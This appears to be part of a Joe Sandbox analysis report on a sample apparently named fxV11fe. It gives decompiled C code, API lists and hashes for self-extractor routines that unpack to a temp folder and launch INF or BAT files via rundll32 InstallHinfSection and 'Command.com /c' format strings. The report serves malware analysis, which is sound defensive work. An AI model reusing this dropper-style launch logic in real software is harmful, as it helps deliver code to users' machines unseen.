                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_a00000_fxV11fe.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Free$Resource$Local$Library$CompareFindString$AddressLoadLockProcSizeofmemcpy_smemset
                                                                                                                                                                                                                                            • String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$D$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$USRQCMD$advpack.dll$lenta
                                                                                                                                                                                                                                            • API String ID: 1032054927-139961720
                                                                                                                                                                                                                                            • Opcode ID: e5fead2c4c6e6ec6fbab2d8f37ae196a6e3c33a9b9e139dd9beb900adb4d95e3
                                                                                                                                                                                                                                            • Instruction ID: 900f6fad37d09b7fa35f84b1a4585083157e8a1d2506466758f74ce99765142c
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e5fead2c4c6e6ec6fbab2d8f37ae196a6e3c33a9b9e139dd9beb900adb4d95e3
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A1B1357260430D9FEB20DF64E945B6B77E8EB88740F000A2DFA85D61E1DB74C906CB96
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 82%
                                                                                                                                                                                                                                            			E00A01AE8(long __ecx, CHAR** _a4, int* _a8) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				char _v527;
                                                                                                                                                                                                                                            				char _v528;
                                                                                                                                                                                                                                            				char _v1552;
                                                                                                                                                                                                                                            				CHAR* _v1556;
                                                                                                                                                                                                                                            				int* _v1560;
                                                                                                                                                                                                                                            				CHAR** _v1564;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t48;
                                                                                                                                                                                                                                            				CHAR* _t53;
                                                                                                                                                                                                                                            				CHAR* _t54;
                                                                                                                                                                                                                                            				char* _t57;
                                                                                                                                                                                                                                            				char* _t58;
                                                                                                                                                                                                                                            				CHAR* _t60;
                                                                                                                                                                                                                                            				void* _t62;
                                                                                                                                                                                                                                            				signed char _t65;
                                                                                                                                                                                                                                            				intOrPtr _t76;
                                                                                                                                                                                                                                            				intOrPtr _t77;
                                                                                                                                                                                                                                            				unsigned int _t85;
                                                                                                                                                                                                                                            				CHAR* _t90;
                                                                                                                                                                                                                                            				CHAR* _t92;
                                                                                                                                                                                                                                            				char _t105;
                                                                                                                                                                                                                                            				char _t106;
                                                                                                                                                                                                                                            				CHAR** _t111;
                                                                                                                                                                                                                                            				CHAR* _t115;
                                                                                                                                                                                                                                            				intOrPtr* _t125;
                                                                                                                                                                                                                                            				void* _t126;
                                                                                                                                                                                                                                            				CHAR* _t132;
                                                                                                                                                                                                                                            				CHAR* _t135;
                                                                                                                                                                                                                                            				void* _t138;
                                                                                                                                                                                                                                            				void* _t139;
                                                                                                                                                                                                                                            				void* _t145;
                                                                                                                                                                                                                                            				intOrPtr* _t146;
                                                                                                                                                                                                                                            				char* _t148;
                                                                                                                                                                                                                                            				CHAR* _t151;
                                                                                                                                                                                                                                            				void* _t152;
				CHAR* _t155;
				CHAR* _t156;
				void* _t157;
				signed int _t158;

				_t48 =  *0xa08004; // 0xe10713fe
				_v8 = _t48 ^ _t158;
				_t108 = __ecx;
				_v1564 = _a4;
				_v1560 = _a8;
				E00A01680( &_v528, 0x104, __ecx);
				if(_v528 != 0x22) {
					_t135 = " ";
					_t53 =  &_v528;
				} else {
					_t135 = "\"";
					_t53 =  &_v527;
				}
				_t111 =  &_v1556;
				_v1556 = _t53;
				_t54 = E00A01A84(_t111, _t135);
				_t156 = _v1556;
				_t151 = _t54;
				if(_t156 == 0) {
					L12:
					_push(_t111);
					E00A01781( &_v268, 0x104, _t111, "C:\Users\jones\AppData\Local\Temp\IXP001.TMP\");
					E00A0658A( &_v268, 0x104, _t156);
					goto L13;
				} else {
					_t132 = _t156;
					_t148 =  &(_t132[1]);
					do {
						_t105 =  *_t132;
						_t132 =  &(_t132[1]);
					} while (_t105 != 0);
					_t111 = _t132 - _t148;
					if(_t111 < 3) {
						goto L12;
					}
					_t106 = _t156[1];
					if(_t106 != 0x3a || _t156[2] != 0x5c) {
						if( *_t156 != 0x5c || _t106 != 0x5c) {
							goto L12;
						} else {
							goto L11;
						}
					} else {
						L11:
						E00A01680( &_v268, 0x104, _t156);
						L13:
						_t138 = 0x2e;
						_t57 = E00A066C8(_t156, _t138);
						if(_t57 == 0 || CompareStringA(0x7f, 1, _t57, 0xffffffff, ".INF", 0xffffffff) != 0) {
							_t139 = 0x2e;
							_t115 = _t156;
							_t58 = E00A066C8(_t115, _t139);
							if(_t58 == 0 || CompareStringA(0x7f, 1, _t58, 0xffffffff, ".BAT", 0xffffffff) != 0) {
								_t156 = LocalAlloc(0x40, 0x400);
								if(_t156 == 0) {
									goto L43;
								}
								_t65 = GetFileAttributesA( &_v268); // executed
								if(_t65 == 0xffffffff || (_t65 & 0x00000010) != 0) {
									E00A01680( &_v1552, 0x400, _t108);
								} else {
									_push(_t115);
									_t108 = 0x400;
									E00A01781( &_v1552, 0x400, _t115,  &_v268);
									if(_t151 != 0 &&  *_t151 != 0) {
										E00A016B3( &_v1552, 0x400, " ");
										E00A016B3( &_v1552, 0x400, _t151);
									}
								}
								_t140 = _t156;
								 *_t156 = 0;
								E00A02AAC( &_v1552, _t156, _t156);
								goto L53;
							} else {
								_t108 = "Command.com /c %s";
								_t125 = "Command.com /c %s";
								_t145 = _t125 + 1;
								do {
									_t76 =  *_t125;
									_t125 = _t125 + 1;
								} while (_t76 != 0);
								_t126 = _t125 - _t145;
								_t146 =  &_v268;
								_t157 = _t146 + 1;
								do {
									_t77 =  *_t146;
									_t146 = _t146 + 1;
								} while (_t77 != 0);
								_t140 = _t146 - _t157;
								_t154 = _t126 + 8 + _t146 - _t157;
								_t156 = LocalAlloc(0x40, _t126 + 8 + _t146 - _t157);
								if(_t156 != 0) {
									E00A0171E(_t156, _t154, "Command.com /c %s",  &_v268);
									goto L53;
								}
								goto L43;
							}
						} else {
							_t85 = GetFileAttributesA( &_v268);
							if(_t85 == 0xffffffff || ( !(_t85 >> 4) & 0x00000001) == 0) {
								_t140 = 0x525;
								_push(0);
								_push(0x10);
								_push(0);
								_t60 =  &_v268;
								goto L35;
							} else {
								_t140 = "[";
								_v1556 = _t151;
								_t90 = E00A01A84( &_v1556, "[");
								if(_t90 != 0) {
									if( *_t90 != 0) {
										_v1556 = _t90;
									}
									_t140 = "]";
									E00A01A84( &_v1556, "]");
								}
								_t156 = LocalAlloc(0x40, 0x200);
								if(_t156 == 0) {
									L43:
									_t60 = 0;
									_t140 = 0x4b5;
									_push(0);
									_push(0x10);
									_push(0);
									L35:
									_push(_t60);
									E00A044B9(0, _t140);
									_t62 = 0;
									goto L54;
								} else {
									_t155 = _v1556;
									_t92 = _t155;
                                                                                                                                                                                                                                            									if( *_t155 == 0) {
                                                                                                                                                                                                                                            										_t92 = "DefaultInstall";
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									 *0xa09120 = GetPrivateProfileIntA(_t92, "Reboot", 0,  &_v268);
                                                                                                                                                                                                                                            									 *_v1560 = 1;
                                                                                                                                                                                                                                            									if(GetPrivateProfileStringA("Version", "AdvancedINF", 0xa01140, _t156, 8,  &_v268) == 0) {
                                                                                                                                                                                                                                            										 *0xa09a34 =  *0xa09a34 & 0xfffffffb;
                                                                                                                                                                                                                                            										if( *0xa09a40 != 0) {
                                                                                                                                                                                                                                            											_t108 = "setupapi.dll";
                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                            											_t108 = "setupx.dll";
                                                                                                                                                                                                                                            											GetShortPathNameA( &_v268,  &_v268, 0x104);
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										if( *_t155 == 0) {
                                                                                                                                                                                                                                            											_t155 = "DefaultInstall";
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										_push( &_v268);
                                                                                                                                                                                                                                            										_push(_t155);
                                                                                                                                                                                                                                            										E00A0171E(_t156, 0x200, "rundll32.exe %s,InstallHinfSection %s 128 %s", _t108);
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										 *0xa09a34 =  *0xa09a34 | 0x00000004;
                                                                                                                                                                                                                                            										if( *_t155 == 0) {
                                                                                                                                                                                                                                            											_t155 = "DefaultInstall";
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										E00A01680(_t108, 0x104, _t155);
                                                                                                                                                                                                                                            										_t140 = 0x200;
                                                                                                                                                                                                                                            										E00A01680(_t156, 0x200,  &_v268);
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									L53:
                                                                                                                                                                                                                                            									_t62 = 1;
                                                                                                                                                                                                                                            									 *_v1564 = _t156;
                                                                                                                                                                                                                                            									L54:
                                                                                                                                                                                                                                            									_pop(_t152);
                                                                                                                                                                                                                                            									return E00A06CE0(_t62, _t108, _v8 ^ _t158, _t140, _t152, _t156);
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}














































                                                                                                                                                                                                                                            0x00a01dba
                                                                                                                                                                                                                                            0x00a01dbe
                                                                                                                                                                                                                                            0x00a01dc3
                                                                                                                                                                                                                                            0x00a01dce
                                                                                                                                                                                                                                            0x00a01dd2
                                                                                                                                                                                                                                            0x00a01deb
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a01df0
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a01dd2
                                                                                                                                                                                                                                            0x00a01bf7
                                                                                                                                                                                                                                            0x00a01bfe
                                                                                                                                                                                                                                            0x00a01c07
                                                                                                                                                                                                                                            0x00a01d55
                                                                                                                                                                                                                                            0x00a01d5a
                                                                                                                                                                                                                                            0x00a01d5b
                                                                                                                                                                                                                                            0x00a01d5d
                                                                                                                                                                                                                                            0x00a01d5e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a01c1b
                                                                                                                                                                                                                                            0x00a01c1b
                                                                                                                                                                                                                                            0x00a01c20
                                                                                                                                                                                                                                            0x00a01c2c
                                                                                                                                                                                                                                            0x00a01c33
                                                                                                                                                                                                                                            0x00a01c38
                                                                                                                                                                                                                                            0x00a01c3a
                                                                                                                                                                                                                                            0x00a01c3a
                                                                                                                                                                                                                                            0x00a01c40
                                                                                                                                                                                                                                            0x00a01c4b
                                                                                                                                                                                                                                            0x00a01c4b
                                                                                                                                                                                                                                            0x00a01c5d
                                                                                                                                                                                                                                            0x00a01c61
                                                                                                                                                                                                                                            0x00a01dd4
                                                                                                                                                                                                                                            0x00a01dd4
                                                                                                                                                                                                                                            0x00a01dd6
                                                                                                                                                                                                                                            0x00a01ddb
                                                                                                                                                                                                                                            0x00a01ddc
                                                                                                                                                                                                                                            0x00a01dde
                                                                                                                                                                                                                                            0x00a01d64
                                                                                                                                                                                                                                            0x00a01d64
                                                                                                                                                                                                                                            0x00a01d67
                                                                                                                                                                                                                                            0x00a01d6c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a01c67
                                                                                                                                                                                                                                            0x00a01c67
                                                                                                                                                                                                                                            0x00a01c6d
                                                                                                                                                                                                                                            0x00a01c72
                                                                                                                                                                                                                                            0x00a01c74
                                                                                                                                                                                                                                            0x00a01c74
                                                                                                                                                                                                                                            0x00a01c8e
                                                                                                                                                                                                                                            0x00a01c99
                                                                                                                                                                                                                                            0x00a01cc0
                                                                                                                                                                                                                                            0x00a01cf8
                                                                                                                                                                                                                                            0x00a01d07
                                                                                                                                                                                                                                            0x00a01d23
                                                                                                                                                                                                                                            0x00a01d09
                                                                                                                                                                                                                                            0x00a01d14
                                                                                                                                                                                                                                            0x00a01d1b
                                                                                                                                                                                                                                            0x00a01d1b
                                                                                                                                                                                                                                            0x00a01d2b
                                                                                                                                                                                                                                            0x00a01d2d
                                                                                                                                                                                                                                            0x00a01d2d
                                                                                                                                                                                                                                            0x00a01d38
                                                                                                                                                                                                                                            0x00a01d39
                                                                                                                                                                                                                                            0x00a01d46
                                                                                                                                                                                                                                            0x00a01cc2
                                                                                                                                                                                                                                            0x00a01cc2
                                                                                                                                                                                                                                            0x00a01ccc
                                                                                                                                                                                                                                            0x00a01cce
                                                                                                                                                                                                                                            0x00a01cce
                                                                                                                                                                                                                                            0x00a01cdb
                                                                                                                                                                                                                                            0x00a01ce6
                                                                                                                                                                                                                                            0x00a01cee
                                                                                                                                                                                                                                            0x00a01cee
                                                                                                                                                                                                                                            0x00a01e89
                                                                                                                                                                                                                                            0x00a01e91
                                                                                                                                                                                                                                            0x00a01e92
                                                                                                                                                                                                                                            0x00a01e94
                                                                                                                                                                                                                                            0x00a01e97
                                                                                                                                                                                                                                            0x00a01ea4
                                                                                                                                                                                                                                            0x00a01ea4
                                                                                                                                                                                                                                            0x00a01c61
                                                                                                                                                                                                                                            0x00a01c07
                                                                                                                                                                                                                                            0x00a01bd3
                                                                                                                                                                                                                                            0x00a01b7b

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CompareStringA.KERNEL32(0000007F,00000001,00000000,000000FF,.INF,000000FF,?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,?,00000000,00000001,00000000), ref: 00A01BE7
                                                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,?,00000000,00000001,00000000), ref: 00A01BFE
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000200,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,?,00000000,00000001,00000000), ref: 00A01C57
                                                                                                                                                                                                                                            • GetPrivateProfileIntA.KERNEL32 ref: 00A01C88
                                                                                                                                                                                                                                            • GetPrivateProfileStringA.KERNEL32(Version,AdvancedINF,00A01140,00000000,00000008,?), ref: 00A01CB8
                                                                                                                                                                                                                                            • GetShortPathNameA.KERNEL32 ref: 00A01D1B
                                                                                                                                                                                                                                              • Part of subcall function 00A044B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A04518
                                                                                                                                                                                                                                              • Part of subcall function 00A044B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00A04554
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.419124794.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419111346.0000000000A00000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419141222.0000000000A08000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_a00000_fxV11fe.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
                                                                                                                                                                                                                                            • String ID: "$.BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
                                                                                                                                                                                                                                            • API String ID: 383838535-819679500
                                                                                                                                                                                                                                            • Opcode ID: 420de1355c21fd516cc31ac19eb7bfd20642c1e7d5cd653fb2533fe59dbdc4fe
                                                                                                                                                                                                                                            • Instruction ID: 4fc84913895064dcc2f92de03691b1b2812443ce753c9db7a84091711964e7ee
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 420de1355c21fd516cc31ac19eb7bfd20642c1e7d5cd653fb2533fe59dbdc4fe
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2BA14670A0021C6BEB24DB24FC84FFA77A9EB55310F144799F595A32D1EBB09E86CB50
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

[Control-flow graph of function a02f1d; legend: Executed / Not Executed]
                                                                                                                                                                                                                                            C-Code - Quality: 82%
                                                                                                                                                                                                                                            			E00A02F1D(void* __ecx, int __edx) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v272;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _v276;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t9;
                                                                                                                                                                                                                                            				void* _t11;
                                                                                                                                                                                                                                            				struct HWND__* _t12;
                                                                                                                                                                                                                                            				void* _t14;
                                                                                                                                                                                                                                            				int _t21;
                                                                                                                                                                                                                                            				signed int _t22;
                                                                                                                                                                                                                                            				signed int _t25;
                                                                                                                                                                                                                                            				intOrPtr* _t26;
                                                                                                                                                                                                                                            				signed int _t27;
                                                                                                                                                                                                                                            				void* _t30;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _t31;
                                                                                                                                                                                                                                            				void* _t34;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _t36;
                                                                                                                                                                                                                                            				intOrPtr _t41;
                                                                                                                                                                                                                                            				intOrPtr* _t44;
                                                                                                                                                                                                                                            				signed int _t46;
                                                                                                                                                                                                                                            				int _t47;
                                                                                                                                                                                                                                            				void* _t58;
                                                                                                                                                                                                                                            				void* _t59;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t43 = __edx;
                                                                                                                                                                                                                                            				_t9 =  *0xa08004; // 0xe10713fe
                                                                                                                                                                                                                                            				_v8 = _t9 ^ _t46;
                                                                                                                                                                                                                                            				if( *0xa08a38 != 0) {
                                                                                                                                                                                                                                            					L5:
                                                                                                                                                                                                                                            					_t11 = E00A05164(_t52);
                                                                                                                                                                                                                                            					_t53 = _t11;
                                                                                                                                                                                                                                            					if(_t11 == 0) {
                                                                                                                                                                                                                                            						L16:
                                                                                                                                                                                                                                            						_t12 = 0;
                                                                                                                                                                                                                                            						L17:
                                                                                                                                                                                                                                            						return E00A06CE0(_t12, _t36, _v8 ^ _t46, _t43, _t44, _t45);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t14 = E00A055A0(_t53); // executed
                                                                                                                                                                                                                                            					if(_t14 == 0) {
                                                                                                                                                                                                                                            						goto L16;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_t45 = 0x105;
                                                                                                                                                                                                                                            						GetSystemDirectoryA( &_v272, 0x105);
                                                                                                                                                                                                                                            						_t43 = 0x105;
                                                                                                                                                                                                                                            						_t40 =  &_v272;
                                                                                                                                                                                                                                            						E00A0658A( &_v272, 0x105, "advapi32.dll");
                                                                                                                                                                                                                                            						_t36 = LoadLibraryA( &_v272);
                                                                                                                                                                                                                                            						_t44 = 0;
                                                                                                                                                                                                                                            						if(_t36 != 0) {
                                                                                                                                                                                                                                            							_t31 = GetProcAddress(_t36, "DecryptFileA");
                                                                                                                                                                                                                                            							_v276 = _t31;
                                                                                                                                                                                                                                            							if(_t31 != 0) {
                                                                                                                                                                                                                                            								_t45 = _t47;
                                                                                                                                                                                                                                            								_t40 = _t31;
                                                                                                                                                                                                                                            								 *0xa0a288("C:\Users\jones\AppData\Local\Temp\IXP001.TMP\", 0); // executed
                                                                                                                                                                                                                                            								_v276();
                                                                                                                                                                                                                                            								if(_t47 != _t47) {
                                                                                                                                                                                                                                            									_t40 = 4;
                                                                                                                                                                                                                                            									asm("int 0x29");
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						FreeLibrary(_t36);
                                                                                                                                                                                                                                            						_t58 =  *0xa08a24 - _t44; // 0x0
                                                                                                                                                                                                                                            						if(_t58 != 0) {
                                                                                                                                                                                                                                            							L14:
                                                                                                                                                                                                                                            							_t21 = SetCurrentDirectoryA("C:\Users\jones\AppData\Local\Temp\IXP001.TMP\"); // executed
                                                                                                                                                                                                                                            							if(_t21 != 0) {
                                                                                                                                                                                                                                            								__eflags =  *0xa08a2c - _t44; // 0x0
                                                                                                                                                                                                                                            								if(__eflags != 0) {
                                                                                                                                                                                                                                            									L20:
                                                                                                                                                                                                                                            									__eflags =  *0xa08d48 & 0x000000c0;
                                                                                                                                                                                                                                            									if(( *0xa08d48 & 0x000000c0) == 0) {
                                                                                                                                                                                                                                            										_t41 =  *0xa09a40; // 0x3, executed
                                                                                                                                                                                                                                            										_t26 = E00A0256D(_t41); // executed
                                                                                                                                                                                                                                            										_t44 = _t26;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									_t22 =  *0xa08a24; // 0x0
                                                                                                                                                                                                                                            									 *0xa09a44 = _t44;
                                                                                                                                                                                                                                            									__eflags = _t22;
                                                                                                                                                                                                                                            									if(_t22 != 0) {
                                                                                                                                                                                                                                            										L26:
                                                                                                                                                                                                                                            										__eflags =  *0xa08a38;
                                                                                                                                                                                                                                            										if( *0xa08a38 == 0) {
                                                                                                                                                                                                                                            											__eflags = _t22;
                                                                                                                                                                                                                                            											if(__eflags == 0) {
                                                                                                                                                                                                                                            												E00A04169(__eflags);
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										_t12 = 1;
                                                                                                                                                                                                                                            										goto L17;
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										__eflags =  *0xa09a30 - _t22; // 0x0
                                                                                                                                                                                                                                            										if(__eflags != 0) {
                                                                                                                                                                                                                                            											goto L26;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										_t25 = E00A03BA2(); // executed
                                                                                                                                                                                                                                            										__eflags = _t25;
                                                                                                                                                                                                                                            										if(_t25 == 0) {
                                                                                                                                                                                                                                            											goto L16;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										_t22 =  *0xa08a24; // 0x0
                                                                                                                                                                                                                                            										goto L26;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								_t27 = E00A03B26(_t40, _t44);
                                                                                                                                                                                                                                            								__eflags = _t27;
                                                                                                                                                                                                                                            								if(_t27 == 0) {
                                                                                                                                                                                                                                            									goto L16;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								goto L20;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_t43 = 0x4bc;
                                                                                                                                                                                                                                            							E00A044B9(0, 0x4bc, _t44, _t44, 0x10, _t44);
                                                                                                                                                                                                                                            							 *0xa09124 = E00A06285();
                                                                                                                                                                                                                                            							goto L16;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t59 =  *0xa09a30 - _t44; // 0x0
                                                                                                                                                                                                                                            						if(_t59 != 0) {
                                                                                                                                                                                                                                            							goto L14;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t30 = E00A0621E(); // executed
                                                                                                                                                                                                                                            						if(_t30 == 0) {
                                                                                                                                                                                                                                            							goto L16;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						goto L14;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t49 =  *0xa08a24;
                                                                                                                                                                                                                                            				if( *0xa08a24 != 0) {
                                                                                                                                                                                                                                            					L4:
                                                                                                                                                                                                                                            					_t34 = E00A03A3F(_t51);
                                                                                                                                                                                                                                            					_t52 = _t34;
                                                                                                                                                                                                                                            					if(_t34 == 0) {
                                                                                                                                                                                                                                            						goto L16;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					goto L5;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(E00A051E5(_t49) == 0) {
                                                                                                                                                                                                                                            					goto L16;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t51 =  *0xa08a38;
                                                                                                                                                                                                                                            				if( *0xa08a38 != 0) {
                                                                                                                                                                                                                                            					goto L5;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				goto L4;
                                                                                                                                                                                                                                            			}




























                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a03015
                                                                                                                                                                                                                                            0x00a02f80
                                                                                                                                                                                                                                            0x00a02f3f
                                                                                                                                                                                                                                            0x00a02f46
                                                                                                                                                                                                                                            0x00a02f5f
                                                                                                                                                                                                                                            0x00a02f5f
                                                                                                                                                                                                                                            0x00a02f64
                                                                                                                                                                                                                                            0x00a02f66
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a02f66
                                                                                                                                                                                                                                            0x00a02f4f
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a02f55
                                                                                                                                                                                                                                            0x00a02f5d
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetSystemDirectoryA.KERNEL32 ref: 00A02F93
                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(?,advapi32.dll), ref: 00A02FB2
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 00A02FC6
                                                                                                                                                                                                                                            • DecryptFileA.ADVAPI32 ref: 00A02FE6
                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 00A02FF8
                                                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 00A0301C
                                                                                                                                                                                                                                              • Part of subcall function 00A051E5: LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00A02F4D,?,00000002,00000000), ref: 00A05201
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.419124794.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419111346.0000000000A00000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419141222.0000000000A08000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_a00000_fxV11fe.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: DirectoryLibrary$AddressAllocCurrentDecryptFileFreeLoadLocalProcSystem
                                                                                                                                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$DecryptFileA$advapi32.dll
                                                                                                                                                                                                                                            • API String ID: 2126469477-3023407756
                                                                                                                                                                                                                                            • Opcode ID: 2e204b7eb60d2d478517f662926a6e4b2d99d2c25f1d7144da18554d2aa75420
                                                                                                                                                                                                                                            • Instruction ID: d363599ccc80d5b0661b090ba95ba78c0ff686d95b6f83c43f4a68fec405e46f
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2e204b7eb60d2d478517f662926a6e4b2d99d2c25f1d7144da18554d2aa75420
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DA41A272B0130D9ADF30EFB5BD4976A73ACAB58794F000165A941C25D2EB78CE83CA65
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            C-Code - Quality: 86%
                                                                                                                                                                                                                                            			E00A02390(CHAR* __ecx) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v276;
                                                                                                                                                                                                                                            				char _v280;
                                                                                                                                                                                                                                            				char _v284;
                                                                                                                                                                                                                                            				struct _WIN32_FIND_DATAA _v596;
                                                                                                                                                                                                                                            				struct _WIN32_FIND_DATAA _v604;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t21;
                                                                                                                                                                                                                                            				int _t36;
                                                                                                                                                                                                                                            				void* _t46;
                                                                                                                                                                                                                                            				void* _t62;
                                                                                                                                                                                                                                            				void* _t63;
